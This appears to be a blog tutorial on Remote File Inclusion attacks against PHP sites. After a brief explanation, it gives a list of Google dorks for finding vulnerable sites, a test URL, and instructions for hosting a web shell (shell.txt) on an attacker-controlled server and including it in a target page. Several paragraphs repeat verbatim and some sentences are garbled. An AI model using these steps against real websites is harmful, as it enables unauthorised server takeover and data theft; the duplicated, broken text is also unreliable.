In my previous tutorial I talked about Remote
File Inclusion which is a type of attack
that targets the computers servers that run Web sites and their web
applications. RFI exploits are most often attributed to the PHP programming
language which is used in many large corporations that includes Facebook and
Sugar CRM. However, RFI can manifest itself in other environments and was in
fact introduced initially as SHTML injection. RFI works by exploiting web applications
that dynamically reference external scripts indicated by user input without
proper sanitation. As a consequence, the application can be instructed to
include a script hosted on a remote server and thus execute code controlled by
an attacker. The executed scripts can be used for temporary data theft or
manipulation, or for a long term takeover of the vulnerable server.
This can lead to
something as minimal as outputting the contents of the file, but depending on
the severity, to list a few it can lead to:
§ Code execution on the web server
§ Code execution on the client-side
such as JavaScript which can lead to other attacks such as cross site scripting
(XSS).
§ Denial of Service (DoS)
§ Data Theft/Manipulation
RFI is a very uncommon
vulnerability due to excessive patches and updates on websites.
So lets start with the
tutorial, but before reading to this tutorial, read Disclaimer first………
the first step would to find a site that is vulnerable to remote file inclusion.
For this You will have to use google dorks. Some of the dorks are like this
inurl:/template.php?pagina=
inurl:/index.php?pagina=
inurl:/index.php?inc=
inurl:/includes/include_onde.php?include_file=
inurl:/index.php?page=
inurl:/index.php?pg=
inurl:/index.php?show=
inurl:/index.php?cat=
inurl:/index.php?file=
inurl:/db.php?path_local=
inurl:/index.php?site=
inurl:/htmltonuke.php?filnavn=
Know you would find the exploit
the first step would to find a site that is vulnerable to remote file inclusion.
For this You will have to use google dorks. Some of the dorks are like this
inurl:/template.php?pagina=
inurl:/index.php?pagina=
inurl:/index.php?inc=
inurl:/includes/include_onde.php?include_file=
inurl:/index.php?page=
inurl:/index.php?pg=
inurl:/index.php?show=
inurl:/index.php?cat=
inurl:/index.php?file=
inurl:/db.php?path_local=
inurl:/index.php?site=
inurl:/htmltonuke.php?filnavn=
Know you would find the exploit
After getting the
website list in Google search, we will have to test the Vulnerability of a
website. In order to understand better I will be giving u an example
Let us suppose we have a vulnerable website say
www.vulnerablesite.com
Now you have to add these keywords into it
index.php?page=www.google.com
And it will become like this
www.vulnerablesite.com/index.php?page=http://www.google.com
Hit Enter, If the executed page will direct us to Google homepage, then we can say that the website is vulnerable to attack.
Know you would exploit the vulnerability
Let us suppose we have a vulnerable website say
www.vulnerablesite.com
Now you have to add these keywords into it
index.php?page=www.google.com
And it will become like this
www.vulnerablesite.com/index.php?page=http://www.google.com
Hit Enter, If the executed page will direct us to Google homepage, then we can say that the website is vulnerable to attack.
Know you would exploit the vulnerability
After this you would
have to upload the shell to the target website. For this we have to take few
things into consideration viz, the shell must be in .txt format (shell.txt)
like Locus. You can see the shell page and download shells from
www.sh3ll.org . Once we have the shell, we will have to upload it to and
free hosting service and the shell page after uploading becomes like this
www.yourownwebsite.com/shell.txt
After this you would have to add the shell page to the vulnerable website. This can be done by adding these keywords to the vulnerable site
www.vulnerablesite.com/v2/index.php?page=http://www.yourownsite.com/shell.txt
Sometimes you will have to use null bytes for it to execute in a successfully If we receive an error from shell.txt then for this we will have to try shell.txt
www.yourownwebsite.com/shell.txt
After this you would have to add the shell page to the vulnerable website. This can be done by adding these keywords to the vulnerable site
www.vulnerablesite.com/v2/index.php?page=http://www.yourownsite.com/shell.txt
Sometimes you will have to use null bytes for it to execute in a successfully If we receive an error from shell.txt then for this we will have to try shell.txt
Please like subscribe
and follow we are close to 10,000 views and when that occurs we are giving away free stuff and will be doing the same once we reach 100 subscribers.
No comments:
Post a Comment